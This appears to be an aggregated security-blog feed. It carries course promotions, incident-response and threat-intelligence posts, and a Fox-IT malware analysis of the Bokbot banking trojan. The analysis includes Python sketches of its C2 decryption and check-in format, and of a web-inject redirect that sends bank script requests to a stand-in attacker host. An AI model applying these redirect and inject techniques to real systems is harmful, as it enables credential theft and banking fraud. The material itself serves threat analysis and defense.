Collaboration has always been cybercriminals’ greatest weapon. It creates massive challenges for the cybersecurity industry and requires us to fight back with a united front of our own. With the support of an entire security community behind you, incident response tasks won’t seem so overwhelming and your resource-strapped SOC will have all the threat data it needs to protect your business.

Discover Community Day at Think 2019

The post Need a Sounding Board for Your Incident Response Plan? Join a Security Community appeared first on Security Intelligence.

Advance Your Blue Teaming Skills with IHRP

The Incident Handling & Response Professional (IHRP) training course is now available for enrollment. Discover this course’s details and see how you can benefit from it to better your defensive skills and become the IR professional companies wish they had.

In today’s hyper-connected world where everyone is a target for cybercriminals, organizations are fighting tooth and nail to find skilled cybersecurity professionals. While red-teaming skills are a great asset, companies expect their IT Security teams not only to know how to defend against and respond to malicious intrusions, but also to have the right skills to hunt threats and secure the organization before such events happen in the first place. If you’re reading this because you’re interested in learning more and/or switching to the blue side of security, then IHRP might just be the right training course for you.

Incident Handling & Response Professional (IHRP) 

The Incident Handling & Response Professional (IHRP) training course is self-paced and highly hands-on. Here are some of the highlights of the course modules:

  • Documents how to set up an incident handling & response capability
  • Analyzes in detail how attackers operate and how to detect each tactic, technique and procedure (TTP) they use
  • Covers detecting intrusions or intrusion attempts during all stages of the Cyber Kill Chain
  • Showcases a variety of different intrusion detection techniques such as: analyzing traffic, flows, and endpoints, as well as performing correlations and endpoint or protocol analytics
  • Covers how to effectively utilize and fine-tune open-source IDS solutions (Snort, Bro, Suricata etc.)
  • Teaches students to get the most out of open-source SIEM solutions (ELK stack, Splunk, Osquery, etc.)
  • Showcases how tactical threat intelligence can enhance your detection capabilities
  • Documents how to leverage baselines for effective intrusion detection
  • Provides students with real-life incident response scenarios

Want to know more? Discover the detailed syllabus here.

Why You Should Consider IHRP
  • Hands-on and real-life scenario labs: There is no substitute for learning IT Security hands-on, just like learning how to drive a car. You have to sit in it to fully learn the skills. All the labs of this training course simulate real-life scenarios.
  • Hours of video course materials: Videos illustrate complicated topics from the course slides and make them easier to understand.
  • Thousands of course slide materials: Interactive learning at your own speed, skipping back and forth to fully understand each topic before practicing labs and/or taking your exam. Slides will always be available to you in your member’s area.
  • Lifetime access to the course materials: Nobody can remember everything; you can always come back to double-check something you learned.
  • Exam voucher to get certified included: There is no additional cost or headache to get certified. Your course content in the Full and Elite Editions covers everything that is needed to pass the exam.
  • Online learning: You can obtain both the theoretical and practical skills from the comfort of your own home or office. A major benefit is that you can decide when to learn, and you can do so at your own speed. This also saves time and additional cost for travel and accommodation.

Get Early Access & 50% Off Your Course Fees

Interested in learning everything blue team? Enjoy 50% off the new IHRP training course fees in Elite Edition when you enroll before December 31, 2018. This early access offer grants you immediate access to the first two modules, ‘Incident Handling Process’ and ‘Intrusion Detection by Analyzing Traffic’, along with hands-on labs in which you will be tasked with detecting real-world attacks and malware. New content will be added automatically to your member’s area every two weeks as it becomes available. Enrollment will then be closed from January 1st until the final release of this training course in March.

Interested in this blue teaming course? Enroll before December 31st and get 50% off your course fees discounted automatically on the checkout page 😉


Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

The 4 Steps Of Incident Handling & Response

An estimated 3.6 billion records were breached in the first 9 months of 2018 alone. While these numbers show some improvement, cyber incidents will inevitably continue to happen. For that reason, security professionals need to know the Incident Handling and Response process.

According to NIST’s Computer Security Incident Handling Guide, the Incident Response (IR) life cycle consists of four phases, as shown below.

1. Preparation

In this initial phase, organizations plan to handle incidents and attempt to limit the number of potential incidents by selecting and implementing a set of controls based on the results of risk assessments. This step involves outlining everyone’s responsibility, hardware, tools, documentation, etc. and taking steps to reduce the possibility of an incident happening.

2. Detection & Analysis

In this phase, the IR team analyzes all the symptoms reported and confirms whether or not the situation would be classified as an incident.

3. Containment, Eradication, and Recovery

In this phase, the IR team gathers intel and creates signatures that will help identify each compromised system. With this information, the organization can mitigate the impact of the incident by containing it, and countermeasures can be put in place to neutralize the attacker and restore systems and data back to normal.

4. Post-incident Activities

This is more of a ‘lesson learned’ phase. Its goal is to improve the overall security posture of the organization and to ensure that similar incidents won’t happen in the future.
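The cycle described above can be sketched as a tiny state machine. The phase names and the loop between detection and containment follow the NIST guide’s life cycle diagram; the code itself is only an illustrative sketch:

```python
# NIST SP 800-61 incident response life cycle as a minimal state machine.
# Containment can loop back to detection as new indicators surface
# during handling, and post-incident lessons feed back into preparation.
TRANSITIONS = {
    "preparation": {"detection_analysis"},
    "detection_analysis": {"containment_eradication_recovery"},
    "containment_eradication_recovery": {"detection_analysis", "post_incident"},
    "post_incident": {"preparation"},
}

def advance(current, nxt):
    """Move to the next phase, rejecting transitions the life cycle forbids."""
    if nxt not in TRANSITIONS[current]:
        raise ValueError(f"invalid transition: {current} -> {nxt}")
    return nxt
```

Encoding the allowed transitions explicitly is a useful exercise: it forces a team to agree, before an incident, on what must be finished in one phase before the next can begin.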

When incidents happen, we tend to panic and wonder “what now?”. It’s important to remain calm and follow best practices and company procedures. For this reason, NIST has published its Computer Security Incident Handling Guide to lead you through the preparation, detection, handling, and recovery steps of Incident Handling & Response.

Interested in learning how to professionally analyze, handle, and respond to security incidents on heterogeneous networks and assets? Check out our new Incident Handling & Response Professional – IHRP – training course.


Searching for Cisco Umbrella Alternatives? Your Affordable Option for DNS Security with Advanced Reporting.

Looking for an affordable alternative to Cisco Umbrella Enterprise’s high cost? ThreatSTOP comes with advanced reporting and security research tools out of the box. See blocked threats, remediate client machines faster and check IOCs. Here’s a breakdown of how ThreatSTOP and Cisco line up.

Introducing Incident Handling & Response Professional (IHRP)

We are introducing the Incident Handling & Response Professional (IHRP) training course on December 11, 2018. Find out more and register for an exciting preview webinar.

No matter the strength of your company’s defense strategy, it is inevitable that security incidents will happen. Poor and/or delayed incident response has caused enormous damage and reputational harm to Yahoo, Uber and, most recently, Facebook, to name a few. For this reason, Incident Response (IR) has become a crucial component of any IT Security department, and knowing how to respond to such events is an increasingly important skill.

Aspiring to switch to a career in Incident Response? Here’s how our new Incident Handling & Response Professional (IHRP) training course can help you learn the necessary skills and techniques for a successful career in this field.

Incident Handling & Response Professional (IHRP) 

The Incident Handling & Response Professional course (IHRP) is an online, self-paced training course that provides all the advanced knowledge and skills necessary to:

  • Professionally analyze, handle and respond to security incidents, on heterogeneous networks and assets
  • Understand the mechanics of modern cyber attacks and how to detect them
  • Effectively use and fine-tune open source IDS, log management and SIEM solutions
  • Detect and even (proactively) hunt for intrusions by analyzing traffic, flows and endpoints, as well as utilizing analytics and tactical threat intelligence

This training is the cornerstone of our blue teaming course catalog or, as we called it internally, “The PTP of Blue Team”.

Discover This Course & Get An Exclusive Offer

Take part in an exciting live demonstration and discover the complete syllabus of our latest course, Incident Handling & Response Professional (IHRP), on December 11. During this event, all the attendees will get their hands on an exclusive launch offer. Stay tuned! 😉

Be the first to know all about this modern blue teaming training course, join us on December 11.


Top 10 Skills Every Purple Teamer Must Have

Today, cyber threats are created faster and are more sophisticated than ever before. Bad actors are ready to go the extra mile to compromise organizations of every type and industry and get their hands on all kinds of information. So, in a hyper-connected world where everyone is a target, what are the top skills purple teamers need to have? Find out.
Top 10 Skills Every Purple Teamer Must Have
  1. Web Application Penetration Testing — The process of using penetration testing techniques on a web application to detect its vulnerabilities before cybercriminals do.
  2. Mobile Penetration Testing — Mobile apps are an increasingly important asset for businesses, but also a growing threat surface. To make sure customers’ data is secure, mobile apps need to be tested for vulnerabilities as well.
  3. WiFi Penetration Testing — A compromised WiFi network puts an entire organization’s network at risk. WiFi penetration testing is a crucial skill for IT Security professionals in 2018, and hiring managers know it.
  4. Advanced Social Engineering — Knowing the various means by which attackers can use social engineering techniques to gain access to an organization’s data is a great skill for all security professionals. You’ll need to be aware of the psychology and technical elements involved in phishing, vishing, baiting, etc.
  5. Advanced Adversary Simulation — By performing security assessments that simulate adversary attacks, an organization’s security is put to the test from the inside out, focusing on what attackers can gain access to once they successfully penetrate the environment.
  6. Defense Evasion — Defense Evasion is a tactic an adversary may use to bypass information security devices and evade detection or other defenses. Needless to say, it’s an essential red-teamer skill too.
  7. Threat Hunting — Threat Hunting skills come with knowing how to proactively search through networks to detect and isolate advanced threats that may have evaded existing security solutions.
  8. Threat Intelligence — By knowing how to analyze internal and external threats an organization may face, you are gathering threat intelligence. This knowledge will then help you make more informed decisions on potential remediation solutions, plans, etc.
  9. Incident Response — Incident response skills come with being able to address and manage the aftermath of a security breach or cyber attack. This comes in handy in a world where an attack happens every 39 seconds on average.
  10. Endpoint Monitoring — Endpoints are typically the initial target because they provide an entry point to the network, and therefore, access to the data attackers want. Knowing how to thoroughly monitor those endpoints and detect unknown threats is a valuable skill for any IT security professional to have.
How Can You Get There?

The purple teamer training path was designed as a guide for you to become equally skilled in both advanced offensive and defensive security techniques. This training path includes the latest versions of our Penetration Testing Professional (PTP), Penetration Testing Extreme (PTX), and Threat Hunting Professional (THP) training courses. Dive into the Purple Teamer path with a free demo of each course and see for yourself!


Special Offer — Until November 30, 2018

If you are just beginning in this field, or if you feel that you need to review the penetration testing basics, we’re offering a free Penetration Testing Student (PTS) training course in Elite Edition with every enrollment in the PTP training course in Elite Edition until November 30, 2018.

Learn more about this offer, or click below to get started NOW.


Bokbot: The (re)birth of a banker

This blogpost is a follow-up to a presentation with the same name, given at SecurityFest in Sweden by Alfred Klason.


Bokbot (aka: IcedID) came to Fox-IT’s attention around the end of May 2017 when we identified an unknown sample in our lab that appeared to be a banker. This sample was also provided by a customer at a later stage.

Having looked into the bot and the operation, our analysis quickly revealed that it is connected to a well-known actor group behind an operation publicly known as 76service, and later Neverquest/Vawtrak, dating back to 2006.

Neverquest operated for a number of years before an arrest led to its downfall in January 2017. Just a few months afterwards, we discovered a new bot with a completely new code base, but based on ideas and strategies from the days of Neverquest. The group’s business ties remain intact: they still utilize services from the same groups as before, but have also expanded to use new services.

This suggests that at least part of the group behind Neverquest is still operating using Bokbot. It is, however, unclear how many people from the core group have continued on with Bokbot.

Bokbot is still a relatively new bot, only recently reaching a production state in which its creators have streamlined and tested their creation. Even though it’s a new bot, the group still has strong connections within the cybercrime underworld, which enable them to maintain and grow their operation, for example by distributing their bot to a larger number of victims.

Looking back at this history and the people behind it, it is highly likely that this threat is not going away anytime soon. Fox-IT rather expects an expansion of both the botnet’s size and the group’s target list.

76service and Neverquest

76service was, what one could call, a big-data mining service for fraud, powered by CRM (aka: Gozi). It was able to gather huge amounts of data from its victims using, for example, form grabbing, in which authorization and login credentials are retrieved from forms submitted to websites by the infected victim.

76service panel login page

The service was initially spotted in 2006 and was put into production in 2007, where the authors started to rent out access to their platform. When given access to the platform, the fraudulent customers of this service could free-text search in the stolen data for credentials that provide access to online services, such as internet banking, email accounts and other online platforms.

76service operated uninterrupted until November 2010, when a Ukrainian national named Nikita Kuzmin was arrested in connection with the operation. This marked the end of 76service.

Nice Catch! – The real name of Neverquest

A few months before his arrest, Nikita shared the source code of CRM within a private group of people, enabling them to continue developing the malware. This, over time, led to the appearance of multiple Gozi strains, but one stood out more than the others, namely: Catch.

Catch was the name given internally by the malware authors, but to the security community and the public it was known as Vawtrak or Neverquest.

During the investigation into Catch, it became clear that 76service and Catch shared several characteristics. For example, both separated their botnets into projects within the panel used for administering their infrastructure and botnets. Instead of having one huge botnet, they assigned every bot build a project ID, which the bot would use to tell the Command & Control (C2) server which specific project it belonged to.

76service and Catch also shared the same business model, where they shifted back and forth between a private and rented model.

The private business model meant that they made use of their own botnet, for their own gain, and the rented business model meant that they rented out access to their botnet to customers. This provided them with an additional income stream, instead of only performing the fraud themselves.

The shift between business models could usually be correlated with either backend servers being seized or people with business ties to the group being arrested. These types of events might have spooked the group into limiting their infrastructure, closing down access for customers.

For the sake of simplicity, Catch will from here on be referred to as Neverquest in this post.

“Quest means business” – Affiliations

A Neverquest infection might not be the only malware lurking on the compromised system. Neverquest has been known to cooperate with other crimeware groups, either to distribute additional malware or to use existing botnets to distribute Neverquest.

During the investigation and tracking of Neverquest Fox-IT identified the following ties:

| Crimeware/malware group | Usage/functionality |
| --- | --- |
| Dyre | Download and execute Dyre on Neverquest infections |
| TinyLoader & AbaddonPOS | Download and execute TinyLoader on Neverquest infections; TinyLoader was later seen downloading AbaddonPOS (as mentioned by Proofpoint) |
| Chanitor/Hancitor | Neverquest leverages Chanitor to infect new victims |

By leveraging these business connections, especially the one with Dyre, Neverquest was able to maximize the monetization of its bots: if a bot was of no interest to the group, it could be handed off to Dyre, which cast a wider net, for example by targeting a bigger or different geographical region or by utilizing the bot in a different way.

More on these affiliations in a later section.

The never-ending quest comes to an end

Neverquest remained at large from around 2010, causing huge financial losses ranging from ticket fraud to wire fraud to credit card fraud. In January 2017, however, the quest came to an end when an individual named Stanislav Lisov was arrested in Spain. Lisov proved to be a key player in the operation: soon after the arrest, the backend servers of Neverquest went offline, never to come back online, marking the end of a six-year fraud operation.

A more detailed background on 76service and Neverquest can be found in a blogpost by PhishLabs.

A wild Bokbot appears!

Early samples of Bokbot were identified in our lab in May 2017 and also provided to us by a customer. At the time, the malware was being distributed to US victims by the Geodo (aka Emotet) spam botnet. The name Bokbot is a nod to a researcher who worked on the very early versions of the malware (you know who you are 😉).

Initial thoughts were that this was a new banking module for Geodo, as that group had not been involved in banking/fraud since May 2015. This scenario was quickly dismissed after we discovered evidence linking Bokbot to Neverquest, which is outlined further below.

Bokbot internals

First, let’s do some housekeeping and look into some of the technical aspects of Bokbot.


All communication between a victim and the C2 server is sent over HTTPS using POST and GET requests. The initial request sent to the C2 is a POST request containing some basic information about the machine it's running on, as seen in the example below. Additional requests, such as requests for configs or modules, are sent as GET requests, except for the uploading of stolen data (files, HTML code, screenshots or credentials), which the victim submits using POST requests.

Even though the above request is from a very early version (14) of the bot, the principle still applies to the current version (101), first seen on 2018-07-17.

| URL param. | Comment |
| --- | --- |
| b | Bot identifier; contains the information needed to identify the individual bot and where it belongs. More information on this in a later section. |
| d | Type of uploaded information, for example screenshot, grabbed form, HTML or a file |
| e | Bot build version |
| i | System uptime |

| POST-data param. | Comment |
| --- | --- |
| k | Computer name (Unicode, URL-encoded) |
| l | Member of domain… (Unicode, URL-encoded) |
| j | Bot requires signature verification for C2 domains and self-updates |
| n | Bot running with privilege level… |
| m | Windows build information (version, arch., build, etc.) |

The parameters that are not included in the table above are used to report stolen data to the C2.
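The parameter layout above can be sketched as a small triage helper. The sample request and the field labels below are illustrative (the labels are taken from the table, the URL and values are invented, not real Bokbot traffic):

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Field meanings taken from the parameter tables above; the sample
# request below is invented for illustration.
URL_FIELDS = {"b": "bot_id", "d": "data_type", "e": "build_version", "i": "uptime"}
POST_FIELDS = {"k": "computer_name", "l": "domain_membership",
               "j": "requires_signed_updates", "n": "privilege_level",
               "m": "windows_build"}

def parse_checkin(url: str, post_body: str) -> dict:
    """Split a check-in request into labelled fields for triage."""
    out = {}
    query = parse_qs(urlsplit(url).query)
    body = parse_qs(post_body)
    for param, name in URL_FIELDS.items():
        if param in query:
            out[name] = query[param][0]
    for param, name in POST_FIELDS.items():
        if param in body:
            out[name] = unquote(body[param][0])
    return out

fields = parse_checkin("https://example.test/in/?b=0123ABCD&d=1&e=14&i=3600",
                       "k=WIN-PC01&n=admin")
print(fields["build_version"])  # -> 14
```

This kind of labelling is handy when eyeballing proxy logs for check-ins across bot versions.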

The C2 response for this particular bot version is a simple set of integers telling the bot which command(s) to execute. This is the only C2 response that is unencrypted; all other responses are encrypted using RC4, and some, like the configs, are also compressed using LZMAT.

After a response is decrypted, the bot will check if the first 4 bytes equal “zeus”.


If the first 4 bytes are equal to “zeus”, it will decompress the rest of the data.

The reason for choosing “zeus” as the signature remains unknown. It could be an intentional false flag, an attempt to trick analysts into thinking this might be a new ZeuS strain; similar deceptive techniques have been used before. A simpler explanation is that the developer has an ironic sense of humor and chose the first malware name that came to mind as the 4-byte signature.
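The decrypt-then-check flow can be sketched as follows. The RC4 routine is the standard algorithm; LZMAT has no Python stdlib equivalent, so the decompression step is only indicated by a comment, and the key and payload are invented:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Standard RC4 KSA + PRGA; RC4 is symmetric, so this both
    # encrypts and decrypts.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def unwrap_response(key: bytes, blob: bytes) -> bytes:
    plain = rc4(key, blob)
    if plain[:4] == b"zeus":
        # Signature matched: the real bot would LZMAT-decompress
        # plain[4:] here.
        return plain[4:]
    return plain

# Round-trip demo with a made-up key and payload:
wrapped = rc4(b"k3y", b"zeus<compressed config bytes>")
print(unwrap_response(b"k3y", wrapped))
```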


Bokbot supports three different types of configs, all of which are in a binary format rather than a structured format such as XML, which is used by TheTrick, for example.

| Config | Comment |
| --- | --- |
| Bot | The latest C2 domains |
| Injects | Contains targets which are subject to web injects and redirection attacks |
| Reporting | Contains targets related to HTML grabbing and screenshots |

The first config, which includes the bot C2 domains, is signed. This prevents a takeover of any of the C2 domains from resulting in a sinkholing of the bots. Updates of the bot itself are also signed.

The other two configs are used to control how the bot will interact with the targeted entities, such as redirecting and modifying web traffic related to for example internet banking and/or email providers, for the purpose of harvesting credentials and account information.

The reporting config serves a more generic purpose: besides screenshots it also drives HTML grabbing, which captures a complete HTML page if a victim browses to an “interesting” website or if the page contains a specific keyword. This enables the actors to conduct reconnaissance for future attacks, such as writing web injects for a previously unknown target.

Geographical foothold

Ever since its appearance, Bokbot has been heavily focused on targeting financial institutions in the US, although the actors still gather any data they deem interesting, such as credentials for online services.

Based on Fox-IT's observations of the malware's spread and the accompanying configs, North America appears to be Bokbot's primary hunting ground, while high infection counts have also been seen in the following countries:

  • United States
  • Canada
  • India
  • Germany
  • Netherlands
  • France
  • United Kingdom
  • Italy
  • Japan

“I can name fingers and point names!” – Connecting the two groups

On a binary level, the two bots do not show much similarity beyond the fact that both communicate over HTTPS and use RC4 in combination with LZMAT compression. That alone wouldn't amount to much of an attribution, as the same combination is used in, for example, ZeuS Gameover, Citadel and Corebot v1.

The table below provides a short summary of the similarities between the groups.

| Connection | Comment |
| --- | --- |
| Bot and project ID format | The usage of projects and the bot ID generation are unique to these groups, along with the format in which this information is communicated to the C2. |
| Inject config | The injects and redirection entries are very similar, and the format hasn't been seen in any other malware family. |
| Reporting config | The targeted URLs and “interesting” keywords are almost identical between the two. |
| Affiliations | The two groups share business affiliations with other crimeware groups. |

Bot ID, URL pattern and project IDs

When both Neverquest and Bokbot communicate with their C2 servers, they have to identify themselves by sending their unique bot ID along with a project ID.

An example of the string that the server uses in order to identify a specific bot from its C2 communication is shown below:


The placement of this string differs between the families: Neverquest (in its latest version) placed it, encoded, in the Cookie header field, while older versions sent it in the URL. Bokbot, on the other hand, sends it in the URL, as shown in a previous section.

One important difference is that Neverquest used a simple number for its project ID (7 in the example above). Bokbot, on the other hand, uses a different, unknown format for its project ID. One theory is that this is a CRC checksum of the project name, chosen to prevent leakage of the number of projects or their names, but this is pure speculation.

Another difference is that Bokbot implements an 8-bit checksum calculated over the project ID and the bot ID. This checksum is validated on the server side; if it doesn't match, no commands are returned.
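The actual checksum algorithm isn't documented, so the sketch below uses a simple additive 8-bit checksum purely to illustrate the server-side validation idea; the project ID and bot ID values are made up:

```python
def checkin_checksum(project_id: int, bot_id: str) -> int:
    # Hypothetical 8-bit checksum: sum all bytes of both fields mod 256.
    # The real Bokbot algorithm is not known; this only illustrates the idea.
    data = project_id.to_bytes(4, "little") + bot_id.encode()
    return sum(data) % 256

def server_accepts(project_id: int, bot_id: str, claimed: int) -> bool:
    # Server-side check: a mismatch means the bot gets no commands back.
    return checkin_checksum(project_id, bot_id) == claimed

cs = checkin_checksum(0x1A2B3C4D, "0123ABCD")
print(server_accepts(0x1A2B3C4D, "0123ABCD", cs))  # -> True
print(server_accepts(0x1A2B3C4D, "0123ABCE", cs))  # tampered bot ID fails
```

A check like this is cheap for the operators but forces anyone probing the C2 to reimplement the bot's ID handling first.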

To date, a total of 20 projects across 25 build versions have been observed, and those numbers keep growing.

Inject config – Dynamic redirect structure

The inject config contains not only web injects but also redirects. Bokbot supports both static redirects, which redirect a fixed URL, and dynamic redirects, which redirect a request based on a target matched with a regular expression.

The above example is a redirect attack from a Neverquest config. A regular expression is matched against the requested URL; on a match, the name of the requested file and its extension are extracted. These two strings are then used to construct a redirect URL controlled by the actors: $1 is replaced with the file name and $2 with the file extension.


How does this compare with Bokbot?


Notice how the redirect URL contains $1 and $2, just as with Neverquest. This could of course be a coincidence, but it should be mentioned that this construction has only been observed in Neverquest and Bokbot.
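A minimal sketch of how such a dynamic redirect entry could be evaluated; the target pattern and attacker URL are invented, but the $1/$2 substitution mirrors the configs shown above:

```python
import re

# Hypothetical dynamic redirect entry modelled on the configs above:
# match any .js file on a targeted host, then rebuild the attacker URL
# from the file name ($1) and extension ($2).
PATTERN = r"https://bank\.example/scripts/([\w-]+)\.(js)"
REDIRECT = "https://evil.example/serve/$1.$2"

def apply_redirect(url: str):
    m = re.match(PATTERN, url)
    if not m:
        return None  # request not targeted, no redirect
    return REDIRECT.replace("$1", m.group(1)).replace("$2", m.group(2))

print(apply_redirect("https://bank.example/scripts/login-check.js"))
# -> https://evil.example/serve/login-check.js
```

Serving the script from attacker infrastructure this way lets the actors alter injected content server-side without pushing a new config to every bot.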

Reporting config

This config was one of the very first things that hinted at a connection between the two groups. Comparing the configs makes it quite clear that there is a big overlap in interesting keywords and URLs:


Neverquest is on the left and Bokbot on the right. Note that this is a simple string comparison between the configs which also includes URLs that are to be excluded from reporting.
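The comparison itself is just string matching. A toy version, with invented config entries standing in for the real keyword lists:

```python
# Toy reproduction of the config comparison: treat each config as a set
# of target strings and intersect them. All entries below are invented
# placeholders, not actual Neverquest/Bokbot config content.
neverquest_cfg = {"/wp-admin/", "mail.", "banking", "ticketmaster", "logout"}
bokbot_cfg = {"/wp-admin/", "mail.", "banking", "crypto", "logout"}

shared = sorted(neverquest_cfg & bokbot_cfg)
only_nq = sorted(neverquest_cfg - bokbot_cfg)
print(f"shared: {shared}")
print(f"unique to Neverquest: {only_nq}")
```

On the real configs, the size of the shared set relative to each config is what makes the overlap convincing rather than coincidental.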

“Guilt by association” – Affiliations

Neither of these groups is short on connections in the cybercrime underworld. As already mentioned, Neverquest had ties with Dyre, a group which by itself caused substantial financial losses. It's also important to take into account that Dyre didn't completely go away after the group was dismantled, but was rather replaced by TheTrick, which gives a further hint of a connection.

| Neverquest affil. | Bokbot affil. | Comment |
| --- | --- | --- |
| Dyre | TheTrick | Neverquest downloads & executes Dyre; Bokbot downloads & executes TheTrick |
| TinyLoader | TinyLoader | Neverquest downloads & executes TinyLoader, which downloads AbaddonPOS; Bokbot downloads & executes TinyLoader, with the additional payload unknown at this time |
| Chanitor | Chanitor | Neverquest utilizes Chanitor for distribution of Neverquest; Bokbot utilizes Chanitor for distribution of Bokbot and downloads the SendSafe spam malware to older infections |
| – | Geodo | Bokbot utilizes Geodo for distributing Bokbot |
| – | Gozi-ISFB | Bokbot utilizes Gozi-ISFB for distributing Bokbot |

There are a few interesting observations regarding the above affiliations. The first concerns Chanitor.

When Bokbot was being distributed by Chanitor, existing Bokbot infections running an older version than the one Chanitor was distributing would receive a download & execute command pointing to the SendSafe spambot, which the Chanitor group uses to send spam. This suggests they may have exchanged “infections for infections”.

The Bokbot affiliation with Geodo is something that cannot be linked to Neverquest, mostly because Geodo's spam operation has not been running long enough to overlap with Neverquest.

The graph below shows all affiliations observed to date.


Events over time

All of the above information has been collected over time while tracking the development of Bokbot. The events and observations are laid out in the timeline below.


The first occurrence of TheTrick being downloaded was in July 2017, and Bokbot has since downloaded TheTrick on several occasions.

At the end of December 2017 there was little Bokbot activity, likely because of the holidays; it's not uncommon for cybercriminals to decrease their activity around the turn of the year. Supposedly everyone needs a holiday, even cybercriminals. They did, however, push an inject config to some bots that targeted *.com, injecting JavaScript to mine the Monero cryptocurrency. As soon as an infected user visited a website with a .com top-level domain (TLD), the browser would start mining Monero for the Bokbot actors. This was likely an attempt to passively monetize the bots while the actors were on holiday.

Bokbot remains active and shows no signs of slowing down. Fox-IT will continue to monitor these actors closely.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better are identifying breaches. The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

Toolsmith Release Advisory: Malware Information Sharing Platform (MISP) 2.4.52

7 OCT 2016 saw the release of MISP 2.4.52.
MISP, Malware Information Sharing Platform and Threat Sharing, is free and open source software to aid in sharing of threat and cyber security indicators.
An overview of MISP as derived from the project home page:
  • Automation:  Store IOCs in a structured manner, and benefit from correlation, automated exports for IDS, or SIEM, in STIX or OpenIOC and even to other MISPs.
  • Simplicity: the driving force behind the project. Storing and using information about threats and malware should not be difficult. MISP allows getting the maximum out of your data without unmanageable complexity.
  • Sharing: the key to fast and effective detection of attacks. Often organizations are targeted by the same Threat Actor, in the same or different Campaign. MISP makes it easier to share with and receive from trusted partners and trust-groups. Sharing also enables collaborative analysis, preventing redundant work.
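The automation point can be sketched against MISP's REST API (its documented restSearch endpoint); the server URL and auth key below are placeholders, and the request is only built, not sent:

```python
import json
from urllib import request

# Sketch of querying MISP's automation API for an indicator. The server
# URL and API key are placeholders for your own MISP instance.
MISP_URL = "https://misp.example.org"
API_KEY = "YOUR-MISP-AUTH-KEY"

def build_search(value: str) -> request.Request:
    """Prepare (but do not send) a search for an indicator across events."""
    body = json.dumps({"returnFormat": "json", "value": value}).encode()
    return request.Request(
        f"{MISP_URL}/attributes/restSearch",
        data=body,
        headers={"Authorization": API_KEY,
                 "Accept": "application/json",
                 "Content-Type": "application/json"},
        method="POST",
    )

req = build_search("198.51.100.7")
print(req.full_url)  # -> https://misp.example.org/attributes/restSearch
# request.urlopen(req) would execute the search against a live instance.
```

The official PyMISP client wraps this same API if you'd rather not build requests by hand.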
The MISP 2.4.52 release includes the following new features:
  • Freetext feed import: a flexible scheme to import any feed available on the internet and incorporate it automatically into MISP. An imported feed can create new events or update existing ones. The freetext feed feature lets you preview the import and quickly integrate external sources.
  • Bro NIDS export added in MISP in addition to Snort and Suricata.
  • A default role can be set allowing flexible role policy.
  • Functionality to allow merging of attributes from a different event.
  • Many updates and improvement in the MISP user-interface including filtering of proposals at index level.
Bug fixes and improvements include:
  • XML STIX export has been significantly improved to ensure enhanced compatibility with other platforms.
  • Bruteforce protection has been fixed.
  • OpenIOC export via the API is now possible.
  • Various bugs at the API level were fixed.
This is an outstanding project that will be the topic of my next Toolsmith In-depth Analysis.

Cheers...until next time.

Beyond the Buzzwords: Why You Need Threat Intelligence

I dislike buzzwords.

Let me be more precise -- I heavily dislike it when a properly useful term is commandeered by the army of marketing people out there and promptly loses any real meaning. It makes me crazy, as it should make you, when a term devised to speak to some new method, utility, or technology becomes virtually meaningless because everyone uses it to mean everything and nothing all at once. Being in a highly dynamic technical field is hard enough without having to play thesaurus games with the marketing people. They always win anyway.

So when I see things like this post, "7 Security buzzwords that need to be put to rest", on one hand I'm happy someone is out there taking the over-marketing and over-hyping of good terms to task, but on the other hand I'm apprehensive and left wondering whether we've thrown the baby out with the bathwater.

In this case, if you look at slide 8, Threat Intelligence, you have this quote:
"This is a term that has been knocked about in the industry for the last couple of years. It really amounts to little more than a glorified RSS feed once you peel back the covers for most offerings in the market place."

I'm unsure whether the author was going for irony or sarcasm, or has simply never seen a good Threat Intelligence feed before -- but this is just categorically wrong. Publishing this kind of thing is irresponsible, and does a disservice to the reading public who take these words for truth from a journalist.

Hyperbole and Irony

Let's be honest, there are plenty of threat intelligence feeds that match that definition. I can think of a few I'd love to tell you about but non-disclosure agreements make that impractical. Then there are those that provide a tremendous amount of value when they are properly utilized at the proper point in time, by the proper resources.

Take for example a JSON-based feed of validated, known-bad IP addresses from one of the many providers of this type of data. I would hardly call this intelligence; it is reputational data in the form of a feed. Sure, it is consumed much like an RSS feed of news -- except that the intent is typically automated consumption by tools and technologies that require very little human intervention.

